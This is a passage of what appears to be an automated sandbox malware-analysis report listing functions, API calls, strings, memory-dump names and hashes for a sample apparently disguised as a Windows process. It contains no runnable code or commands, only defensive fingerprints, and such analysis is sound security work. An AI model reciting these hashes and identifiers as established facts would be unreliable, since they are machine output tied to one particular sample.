Instruction Fuzzy Hash: 16E0EC31952721A7D6615BA0BC0DFDA3ED8AB19F53F418101FA05A7190EF6986018BA1

Function 00ACA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 00ACA699: GetDC.USER32(00000000), ref: 00ACA69D
Part of subcall function 00ACA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00ACA6A8
Part of subcall function 00ACA699: ReleaseDC.USER32(00000000,00000000), ref: 00ACA6B3

GetObjectW.GDI32(?,00000018,?), ref: 00ACA83C

Part of subcall function 00ACAAC9: GetDC.USER32(00000000), ref: 00ACAAD2
Part of subcall function 00ACAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00ACAB01
Part of subcall function 00ACAAC9: ReleaseDC.USER32(00000000,?), ref: 00ACAB99

Strings

(, xrefs: 00ACA9AA

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 020493c5af3ace69eb0cf5e7e8ece75a7ff40b364c6526e22e438aa74e81c1a6
Instruction ID: 43d24e527046661b34927a3b7b66e4620dceaf4361c7f248329c2691e1eb1f78
Opcode Fuzzy Hash: 020493c5af3ace69eb0cf5e7e8ece75a7ff40b364c6526e22e438aa74e81c1a6
Instruction Fuzzy Hash: DE91E271604344AFDA10DF65C888E6BBBE8FF99704F01491EF59AD7220DB30A906CB62

Function 00AB75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00AB75E3

Part of subcall function 00AC05DA: _wcslen.LIBCMT ref: 00AC05E0

Part of subcall function 00ABA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00ABA598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00AB777F

Part of subcall function 00ABA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00ABA325,?,?,?,00ABA175,?,00000001,00000000,?,?), ref: 00ABA501
Part of subcall function 00ABA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00ABA325,?,?,?,00ABA175,?,00000001,00000000,?,?), ref: 00ABA532

Strings

:, xrefs: 00AB7654

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: f9459899f2428e0598522bd6306d3cc8acb43b1cbc962d981d85bc5f7f13e711
Instruction ID: bafe8b64eac4c0fec20c7712b39d2ecf4cc1540b9cb1fcc1a00cf6d3cb03d874
Opcode Fuzzy Hash: f9459899f2428e0598522bd6306d3cc8acb43b1cbc962d981d85bc5f7f13e711
Instruction Fuzzy Hash: DE416171801158AAEB35EB64CE55EEEB77CAF95300F004096B609A7093DBB45F89CF60

Function 00ACB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00ACB4E3
_wcslen.LIBCMT ref: 00ACB4FE

Strings

}, xrefs: 00ACB4D6

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: b58c882ec93bb3031ca5d933d49d64c6ebdaf7d395c55fbd855edd47807b9565
Instruction ID: 3e1cc748c6d3f013b02ec1d6de78dc11b0cdd9d27ac723c5205fc47431d78ded
Opcode Fuzzy Hash: b58c882ec93bb3031ca5d933d49d64c6ebdaf7d395c55fbd855edd47807b9565
Instruction Fuzzy Hash: C621F67291430A5ADB31EB64D946F6BB3ECDF51750F06042EF642C7242EB66DD4883B2

Function 00ABF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00ABF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00ABF2E4
Part of subcall function 00ABF2C5: GetProcAddress.KERNEL32(00AF81C8,CryptUnprotectMemory), ref: 00ABF2F4

GetCurrentProcessId.KERNEL32(?,?,?,00ABF33E), ref: 00ABF3D2

Strings

CryptProtectMemory failed, xrefs: 00ABF389
CryptUnprotectMemory failed, xrefs: 00ABF3CA

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: eea6c727a6f41eaab0d4a9a5a1eb9cf166312d5c40544946dc0d1912419c21bd
Instruction ID: 46e558887b36f0abfe97c45464b956c10c61ad0bf52560d04d230f878d608333
Opcode Fuzzy Hash: eea6c727a6f41eaab0d4a9a5a1eb9cf166312d5c40544946dc0d1912419c21bd
Instruction Fuzzy Hash: 70112632601669AFDF119F61DD45AFE3B9CFF00760B084226FC515F253DA349D428794

Function 00ABB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00ABB9B8

Part of subcall function 00AB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00AB40A5

Strings

%c:\, xrefs: 00ABB9AE

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: 2dc881cc99ad77dcab571cd1167491d1c777211397748a0827c03c8af37d65ae
Instruction ID: d6038efcbe8687b60d6f41ad0eb5ee49c53647c816cb90c9725c75b053958c68
Opcode Fuzzy Hash: 2dc881cc99ad77dcab571cd1167491d1c777211397748a0827c03c8af37d65ae
Instruction Fuzzy Hash: 3001F5635103117A9A30AB398C86DABB7ACEE967B0B40481FF545D7183EB70D840D3F1

Function 00AC101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,00AC1160,?,00000000,00000000), ref: 00AC1043
SetThreadPriority.KERNEL32(?,00000000), ref: 00AC108A

Part of subcall function 00AB6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00AB6C54

Strings

CreateThread failed, xrefs: 00AC104F

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: c750278fb37f51db0a9b8316e299b25c2d1dd76dacce3242e947834a04c9c807
Instruction ID: c867f8dcf66952658f4225d07854b0447129c9bd2a8615aaf0a71da574396bcb
Opcode Fuzzy Hash: c750278fb37f51db0a9b8316e299b25c2d1dd76dacce3242e947834a04c9c807
Instruction Fuzzy Hash: 8B014EB5300349BFD3309FA49C51F76739CFB41351F10052DF64256282DEB1AC858724

Function 00AB1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00ABE2E8: _swprintf.LIBCMT ref: 00ABE30E
Part of subcall function 00ABE2E8: _strlen.LIBCMT ref: 00ABE32F
Part of subcall function 00ABE2E8: SetDlgItemTextW.USER32(?,00AEE274,?), ref: 00ABE38F
Part of subcall function 00ABE2E8: GetWindowRect.USER32(?,?), ref: 00ABE3C9
Part of subcall function 00ABE2E8: GetClientRect.USER32(?,?), ref: 00ABE3D5

GetDlgItem.USER32(00000000,00003021), ref: 00AB135A
SetWindowTextW.USER32(00000000,00AE35F4), ref: 00AB1370

Strings

0, xrefs: 00AB1319

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: caf4fe54abac12265f13fd7a60d0980125637b9f5f6f16e4d0e203825384e320
Instruction ID: e258015e3bd41907724d44d20daec78db67d864c82a57f87600edaeda175d44c
Opcode Fuzzy Hash: caf4fe54abac12265f13fd7a60d0980125637b9f5f6f16e4d0e203825384e320
Instruction Fuzzy Hash: F5F08C3410428CBADF550F60881DAEA3FECAF02344F848114FD44695A2FB75CA90AB10

Function 00AC0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00AC1206,?), ref: 00AC0FEA
GetLastError.KERNEL32(?), ref: 00AC0FF6

Part of subcall function 00AB6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00AB6C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00AC0FFF

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 32cb0afd4d9c35eb2fa1263683694b5005388e821c4be9ab166827f8eb6de51a
Instruction ID: 7c289ae423e97bb70f0d2564ae0ca809d8675cd7e81def6d170ef900e34cf8c6
Opcode Fuzzy Hash: 32cb0afd4d9c35eb2fa1263683694b5005388e821c4be9ab166827f8eb6de51a
Instruction Fuzzy Hash: 11D02B3250416076CA1033656D09DBF3C08AF13331B600B14F139692E3CE240D824791

Function 00ABE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00ABDA55,?), ref: 00ABE2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00ABDA55,?), ref: 00ABE2B1

Strings

RTL, xrefs: 00ABE2AB

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: f39b88cae3aac9aacc9fa412238251c7297d15b84162d4993ee94f969f041e77
Instruction ID: acb56c0e90fc6f5ebb3c6a505a5985170de3e7d59df0613d6541889ba904d431
Opcode Fuzzy Hash: f39b88cae3aac9aacc9fa412238251c7297d15b84162d4993ee94f969f041e77
Instruction Fuzzy Hash: 3EC0123224079066EE3097B56C4DBC36A585B00B51F05045CB241EF5D1D6E6C58187A0

Analysis Process: SurrogatesessionRuntimeBrokerDhcp.exePID: 7616, Parent PID: 7564COMMON

Execution Graph

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9BAB0D4C Relevance: 1.5, Strings: 1, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5Z_H, xrefs: 00007FFD9BAB0DF3

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID: 5Z_H
API String ID: 0-3267294416
Opcode ID: 4a8ea52100bed731f3903cc10b805c98a2ff23f9a20b7fce80c36f4121c309f4
Instruction ID: 713356083703f4bb99092cb4c63098c531b49e50652808a48a40bfff7ffff102
Opcode Fuzzy Hash: 4a8ea52100bed731f3903cc10b805c98a2ff23f9a20b7fce80c36f4121c309f4
Instruction Fuzzy Hash: B991E172A0DA9D4FE799DB6C88757A87FE1FF59314F4001BED059CB2E6CAB818148B40

Function 00007FFD9BAB0B3F Relevance: 3.8, Strings: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!k9, xrefs: 00007FFD9BAB0B4E
c9, xrefs: 00007FFD9BAB0B56
"s9, xrefs: 00007FFD9BAB0B46

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9
API String ID: 0-3426396564
Opcode ID: 3cd02d0eb109a1a1650aeb2979787fe448008a7debed3c118dac27178906aec0
Instruction ID: 8d6a9f2a328c8e06969da36c90a488676594f04ac7e0f834c9b035bf51bea0a7
Opcode Fuzzy Hash: 3cd02d0eb109a1a1650aeb2979787fe448008a7debed3c118dac27178906aec0
Instruction Fuzzy Hash: 3A01442772DA6A8FC6426BBDFC541D8BB50EBC6176B9601FBD144CB2A2E110285FC7D0

Function 00007FFD9BEAC8FF Relevance: 1.7, APIs: 1, Instructions: 240
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryFullProcessImageNameA.KERNEL32 ref: 00007FFD9BEACA91

Memory Dump Source

Source File: 00000004.00000002.1802150534.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bea0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: 5dc5055d3d7122e220d1619df9c8b7c8f391d2ae3f6072719317d4eab1ecfafd
Instruction ID: 78ddc5f4c56903cbc6f2479d0bea7a4221beb70f71f037181fd861e18dd46591
Opcode Fuzzy Hash: 5dc5055d3d7122e220d1619df9c8b7c8f391d2ae3f6072719317d4eab1ecfafd
Instruction Fuzzy Hash: 9571CF70618A8D8FDB68DF28C8567F937E5FB58311F00423EE84EC7292CB75A9418B81

Function 00007FFD9BAB095A Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0a3b2982e105cb479192d15e64b1cc5686e75c5ed81667055acc88aff000516
Instruction ID: 74ad89b3597d4884a9b802b6ae1529aa6b02aa6da2dfb689294cc7066cca25d9
Opcode Fuzzy Hash: b0a3b2982e105cb479192d15e64b1cc5686e75c5ed81667055acc88aff000516
Instruction Fuzzy Hash: C6314821B0CA690FE368B76CA4A65F933C1DF58326F1405BBE40EC71E3CD18AC418684

Function 00007FFD9BAB0908 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a2a571e29025dd175f74deef1ab5974f25b209cdbb7d087d25e6140e5350416
Instruction ID: ea599f3fd5d6b673e2185625c8d67d94de3f8cf9a2173c3561d135aa9bbece8b
Opcode Fuzzy Hash: 3a2a571e29025dd175f74deef1ab5974f25b209cdbb7d087d25e6140e5350416
Instruction Fuzzy Hash: 7D21E63130D8184FEBA8EB4CE88A9B973D1EB5932171105BAE58AC7136D951EC928BC1

Function 00007FFD9BAB0960 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3935924d6331f175803307a567ca24662c673f9c0a0787c2c102371e01f140de
Instruction ID: 9b13b64f5c9ec1347803c100305bd6e78ee24fcee1c31d26efef5bf1645ecaef
Opcode Fuzzy Hash: 3935924d6331f175803307a567ca24662c673f9c0a0787c2c102371e01f140de
Instruction Fuzzy Hash: F0313722B0C92D1FE768B76C6466AF933C1DF5832AF1405BBE41EC71E7CC18AC418685

Function 00007FFD9BAB0998 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9af8cbd59d9860f4951ce68fd0536287f737a0ddb1082fb42a062d696e80714
Instruction ID: 3aa331762fef8908c7f2f29034ff8701e2ea0752f6d2cb79055469e9cc8f7560
Opcode Fuzzy Hash: b9af8cbd59d9860f4951ce68fd0536287f737a0ddb1082fb42a062d696e80714
Instruction Fuzzy Hash: C4216621B1D96E0FE798B76C946ABB937C2EF98325F0401BDE40DC32E3CD18AC418681

Function 00007FFD9BAB0C25 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a86cfcf701c7672ba51e086c5ff520d6186849c52fbfdf1f754bc3acc76be69
Instruction ID: fb763a53d79441f7ca6a959d0bf8e95228ecb2236621b28ea6f9a206fcb0ad7f
Opcode Fuzzy Hash: 1a86cfcf701c7672ba51e086c5ff520d6186849c52fbfdf1f754bc3acc76be69
Instruction Fuzzy Hash: 6B315A31B0D26D8FE332E7A998652EC7B60EF42325F0541B7D0688B1D3DA782646CB85

Function 00007FFD9BAB2718 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b599a65e8aada8c921106dec9c118dba16cd1ded5e1bf227eb2a2581d2f1a59b
Instruction ID: ebe58e2fe846ffa561fefb5affd496ca8f6693cd9c55844d8e45e455a2f5635f
Opcode Fuzzy Hash: b599a65e8aada8c921106dec9c118dba16cd1ded5e1bf227eb2a2581d2f1a59b
Instruction Fuzzy Hash: 55119421E0E63E4AE774A7D8A4647B865D0FF48710F1201B6D42ED31B7DD686E814D48

Function 00007FFD9BAB108D Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 589bc4d9afa0a2f7d67b18dd7be76d522406103826fa29db59d6ddd1d9cf1253
Instruction ID: fb09ef8f6ae8b14dd335b0027949d90a8d56e723e202ee1e984ab4db61796708
Opcode Fuzzy Hash: 589bc4d9afa0a2f7d67b18dd7be76d522406103826fa29db59d6ddd1d9cf1253
Instruction Fuzzy Hash: F9012B2198E6D51FE76947B44C719F13F90DF97250B0A02FAD099CB1F3C84D18468751

Function 00007FFD9BAB0C38 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf982ff3146a51919323aa3dafb1cbbcfb709b6235f84585226eea4929da00cb
Instruction ID: db01986f9995d5ff49fed8cd6808865693a6b4daaa60aa836e93866e7925897b
Opcode Fuzzy Hash: bf982ff3146a51919323aa3dafb1cbbcfb709b6235f84585226eea4929da00cb
Instruction Fuzzy Hash: 23110831B0D65D8FE732DBB988641EC7FB0EF42311F1644B7C094DB2A2EA7456458B84

Function 00007FFD9BAB0C40 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed55df7edb677436e46243b3aaa3d901e678d4e3235d6d106afb1eb579b5de66
Instruction ID: 058e5e9ee4c7cbd81746ce725ef5229b683b3e0298e24e886c4d504738c2da0d
Opcode Fuzzy Hash: ed55df7edb677436e46243b3aaa3d901e678d4e3235d6d106afb1eb579b5de66
Instruction Fuzzy Hash: 1901D231B0E29C8FE722DBA888641ECBFB0EF42310F1645F7C494DB2A2DA745645CB84

Function 00007FFD9BAB27F4 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1790613614.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bab0000_SurrogatesessionRuntimeBrokerDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feba646d7ecd0ed23bcc862e10c34e4c3d946be5a326f7f32714caf4bf7cb564
Instruction ID: 8658c7689501d981951f0935c3d36ab61659527d086ea77e3463ed31637b65d4
Opcode Fuzzy Hash: feba646d7ecd0ed23bcc862e10c34e4c3d946be5a326f7f32714caf4bf7cb564
Instruction Fuzzy Hash: B9011D31E0952E4AEB74EB94D8646F862A1FB54310F1201FAD45ED31B2DEB86EC28E44

Function 00007FFD9BAB0C48 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

